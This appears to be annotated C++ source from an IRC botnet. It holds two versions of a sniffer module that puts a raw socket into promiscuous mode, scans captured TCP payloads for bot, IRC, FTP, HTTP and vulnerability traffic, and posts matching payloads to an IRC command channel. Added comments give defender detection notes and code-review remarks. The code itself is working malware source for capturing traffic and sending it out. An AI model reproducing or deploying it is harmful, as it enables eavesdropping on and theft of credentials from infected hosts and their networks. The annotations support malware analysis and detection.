/**
 * CSniffer::Run - thread body of the bot's on-host traffic sniffer.
 *
 * Opens a raw IP socket bound to the host's first resolved address, puts it
 * into receive-all mode on Windows (SIO_RCVALL), then loops while the main
 * controller is running: each received datagram whose IP protocol field is 6
 * (TCP) is parsed for source/destination ports, CR/LF in the payload are
 * flattened to spaces, and the payload is run through the IsSuspicious*
 * classifiers; a hit is reported to the configured IRC channel with a
 * "<kind> sniff" line. Traffic on ports 25, 110 and the bot's own si_port is
 * skipped; the Bot/IRC/FTP classifiers are additionally skipped for port 80.
 *
 * Defender notes: a raw SOCK_RAW socket plus SIO_RCVALL needs administrative
 * rights and is a strong host-telemetry signal (promiscuous capture from a
 * non-capture process); the fixed "... sniff \"%s:%d\" to \"%s:%d\"" message
 * shape is a usable IRC C2 content signature. The poll loop below keeps the
 * socket open and the thread alive even while the feature is disabled.
 *
 * Returns NULL on every path (thread-function convention used by the project).
 */
void *CSniffer::Run()
{
    int sock;
    sockaddr_in addr_in;
    hostent *hEnt;
    IPHEADER *ipHeader;
    TCPHEADER *tcpHeader;
    char *szPacket;
    char szName[255]={0};
    unsigned long lLocalIp;

    // Bind address: port 0, address filled in from the local host name below.
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=0;
    addr_in.sin_addr.s_addr=0;
    gethostname(szName, sizeof(szName));
    hEnt=gethostbyname(szName);
    // NOTE(review): hEnt is dereferenced without a NULL check; gethostbyname
    // can fail (e.g. no resolver), in which case this is a NULL dereference.
    memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
    addr_in.sin_addr.s_addr=lLocalIp;

    // Raw IP socket: the IP header is delivered with each datagram.
    sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
    if(sock==INVALID_SOCKET) return NULL;
    if(bind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR)
    {
#ifdef _WIN32
        closesocket(sock);
#else
        close(sock);
#endif // _WIN32
        return NULL;
    }
    // NOTE(review): this block is guarded by WIN32 while the close path above
    // uses _WIN32 - the two macros are not always both defined.
#ifdef WIN32
    int optval=1;
    DWORD dwBytesRet;
    // Receive-all (promiscuous) mode for the bound interface.
    if(WSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
    {
        closesocket(sock);
        return NULL;
    }
#endif // WIN32

    // Whole-datagram receive buffer; the IP header is read in place at offset 0.
    char szRecvBuf[65535];
    ipHeader=(IPHEADER*)szRecvBuf;
    int iRead;
    while(g_pMainCtrl->m_bRunning)
    {
        // Clear the buffer (the later strlen() on the payload relies on this
        // zero fill for its terminator).
        memset(szRecvBuf, 0, sizeof(szRecvBuf));
        iRead=0;
        // Wait till the sniffer is enabled (polled once per second; the
        // m_bRunning flag is not re-checked while waiting).
        while(!g_pMainCtrl->m_cBot.sniffer_enabled.bValue) Sleep(1000);
        // Read the raw packet
#ifdef _WIN32
        iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
#else
        iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
#endif // _WIN32
        // NOTE(review): iRead is never consulted - a failed or short recv()
        // still falls through to the header and payload parsing below, and a
        // full-size read leaves no NUL for strlen() on the payload.
        // Process if its a TCP/IP packet (IP protocol number 6 == TCP).
        if(ipHeader->proto==6)
        {
            // TCP header is assumed to follow a fixed-size IP header
            // (sizeof(*ipHeader)); IP options are not accounted for.
            tcpHeader=(TCPHEADER*)(szRecvBuf+sizeof(*ipHeader));
            int iSrcPort, iDestPort;
            char szSrcHost[2048], szDestHost[2048];
            iSrcPort=ntohs(tcpHeader->th_sport);
            iDestPort=ntohs(tcpHeader->th_dport);
            // Skip POP3 (110), SMTP (25) and the bot's own si_port.
            if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25 && iSrcPort!=g_pMainCtrl->m_cBot.si_port.iValue && iDestPort!=g_pMainCtrl->m_cBot.si_port.iValue)
            {
                // to_in_addr() presumably adapts the header's address field to
                // in_addr for inet_ntoa(); its definition is not in this file.
                sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
                sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
                // Payload start: fixed IP header + fixed TCP header, TCP
                // options are not skipped.
                szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
                // Flatten line breaks so the payload fits on one IRC line.
                // (strlen() is re-evaluated every iteration.)
                for(int i=0; i<strlen(szPacket); i++)
                {
                    if(szPacket[i]=='\r') szPacket[i]='\x20';
                    if(szPacket[i]=='\n') szPacket[i]='\x20';
                }
                // Classifier chain; first match wins. Bot/IRC/FTP checks are
                // skipped for port 80, HTTP and VULN are not.
                if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
                {
                    g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                }
                else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
                {
                    g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                }
                else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
                {
                    g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                }
                else if(IsSuspiciousHTTP(szPacket))
                {
                    g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                }
                else if(IsSuspiciousVULN(szPacket))
                {
                    // VULN hits go to a separate channel (vuln_channel).
                    g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.vuln_channel.sValue.Str(), "VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                }
            }
        }
    }
    // NOTE(review): the socket is not closed when m_bRunning drops to false.
    return NULL;
}
/**
 * SnifferThread - Win32 thread entry for the sniffer module.
 *
 * Copies the SNIFFER parameters out of `param`, flags `gotinfo` on the shared
 * copy (presumably so the creator knows the struct may be reused - confirm
 * against the caller), then runs the same capture loop as CSniffer::Run: raw
 * IP socket bound to the host's first address, SIO_RCVALL, parse TCP
 * datagrams, flatten CR/LF, classify with IsSuspicious*, and report hits to
 * the IRC channel in `sniff` unless `sniff.silent` is set. Unlike the class
 * version, socket setup failures are reported to IRC and the log, and there
 * is no enable flag: the loop is unconditional (`while(1)`) and is only left
 * by thread termination.
 *
 * Defender notes: the `f`-prefixed calls (fsocket, fbind, fWSAIoctl, ...)
 * appear to be the project's own wrappers around the Winsock API -
 * NOTE(review): their resolution is not visible in this file. Raw socket
 * creation with SIO_RCVALL and the fixed "...SNIFFER..." IRC prefix are the
 * observable artifacts of this thread.
 *
 * @param param  pointer to a SNIFFER describing the IRC socket/channel,
 *               silent/notice flags and the thread slot number.
 * @return       0; in practice the thread exits via ExitThread(0).
 */
DWORD WINAPI SnifferThread(LPVOID param)
{
    // Private copy of the parameters; `sniffs` only serves to set gotinfo.
    SNIFFER sniff = *((SNIFFER *)param);
    SNIFFER *sniffs = (SNIFFER *)param;
    sniffs->gotinfo = TRUE;
    char sendbuf[IRCLINE];
    int sock;
    sockaddr_in addr_in;
    hostent *hEnt;
    IPHEADER *ipHeader;
    tcp_hdr_sniffer *tcpHeader;
    char *szPacket;
    char szName[255]={0};
    unsigned long lLocalIp;

    // Bind address: port 0, local address resolved from the host name.
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=0;
    addr_in.sin_addr.s_addr=0;
    fgethostname(szName, sizeof(szName));
    hEnt=fgethostbyname(szName);
    // NOTE(review): hEnt is not checked for NULL before being dereferenced.
    memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
    addr_in.sin_addr.s_addr=lLocalIp;

    sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
    // NOTE(review): returns NULL from a DWORD function (evaluates to 0) and
    // does not clearthread() the slot, unlike the later failure paths.
    if(sock==INVALID_SOCKET) return NULL;
    if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR)
    {
        // sendbuf is IRCLINE bytes; this message is short and fixed-format.
        sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
        if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
        addlog(sendbuf);
        fclosesocket(sock);
        clearthread(sniff.threadnum);
        ExitThread(0);
    }
    // Receive-all (promiscuous) mode; requires administrative rights.
    int optval=1;
    DWORD dwBytesRet;
    if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
    {
        sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
        if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
        addlog(sendbuf);
        fclosesocket(sock);
        clearthread(sniff.threadnum);
        ExitThread(0);
    }

    // Whole-datagram receive buffer; the IP header is read in place at offset 0.
    char szRecvBuf[65535];
    ipHeader=(IPHEADER*)szRecvBuf;
    int iRead;
    // Unconditional loop: only thread termination ends it, so the code after
    // the loop is never reached.
    while(1)
    {
        // Clear the buffer (strlen() on the payload depends on this zero fill).
        memset(szRecvBuf, 0, sizeof(szRecvBuf));
        iRead=0;
        // Read the raw packet
        iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
        // NOTE(review): iRead is never consulted; a failed or short receive
        // still reaches the header parsing below.
        // Process if its a TCP/IP packet (IP protocol number 6 == TCP).
        if(ipHeader->proto==6)
        {
            // Fixed-size IP header assumed; IP options are not accounted for.
            tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
            int iSrcPort, iDestPort;
            char szSrcHost[2048], szDestHost[2048];
            iSrcPort=ntohs(tcpHeader->th_sport);
            iDestPort=ntohs(tcpHeader->th_dport);
            // Skip POP3 (110) and SMTP (25) in either direction.
            if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25)
            {
                // to_in_addr() presumably adapts the header's address field to
                // in_addr for inet_ntoa(); it is not defined in this file.
                sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
                sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
                // Payload start: fixed IP header + fixed TCP header; TCP
                // options are not skipped.
                szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
                // Flatten line breaks so the payload fits on one IRC line.
                for(int i=0; i<(int)strlen(szPacket); i++)
                {
                    if(szPacket[i]=='\r') szPacket[i]='\x20';
                    if(szPacket[i]=='\n') szPacket[i]='\x20';
                }
                // Classifier chain; first match wins. Bot/IRC/FTP checks are
                // skipped for port 80. Each report is bounded to IRCLINE by
                // _snprintf, so a long payload is truncated rather than overrun.
                if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
                {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
                {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
                {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(IsSuspiciousHTTP(szPacket))
                {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(IsSuspiciousVULN(szPacket))
                {
                    // Unlike CSniffer::Run, VULN hits go to the same channel here.
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
            }
        }
    }
    // Unreachable: the while(1) above never exits normally.
    fclosesocket(sock);
    clearthread(sniff.threadnum);
    ExitThread(0);
    return 0;
}